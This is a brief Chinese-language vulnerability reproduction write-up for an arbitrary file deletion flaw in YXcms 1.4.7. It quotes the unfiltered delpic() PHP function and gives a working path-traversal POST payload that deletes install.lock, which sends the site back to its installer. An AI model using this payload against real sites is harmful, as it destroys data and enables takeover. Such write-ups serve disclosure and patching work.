YXcms 1.4.7 任意文件删除
一、漏洞简介
二、漏洞影响
YXcms 1.4.7
三、复现过程
漏洞分析
漏洞文件:protected/apps/admin/controller/photoController.php,在第355行的delpic()函数,可以看到\$picname接收POST过来的值,然后\$path等于文件开头定义的静态变量 static protected \$uploadpath=\'\';//图片上传路径 没有对传入的值进行任何的过滤,使用函数file_exists()判断一下文件是否存在就给unlink执行删除文件了。
public function delpic()
{
if(empty($_POST['picname'])) $this->error('参数错误~');
$picname=$_POST['picname'];
$path=$this->uploadpath;
if(file_exists($path.$picname))
@unlink($path.$picname);
else{echo '图片不存在~';return;}
if(file_exists($path.'thumb_'.$picname))
@unlink($path.'thumb_'.$picname);
else {echo '缩略图不存在~';return;}
echo '原图以及缩略图删除成功~';
}
复现
需要先登录后台,然后访问之后会显示缩略图不存在
payload
http://0-sec.org/index.php%3Fr%3Dadmin/photo/delpic
POST:
picname=../../protected/apps/install/install.lock
然后访问网站首页就会自动转到安装的页面
看到目录下的install.lock文件已经被删除了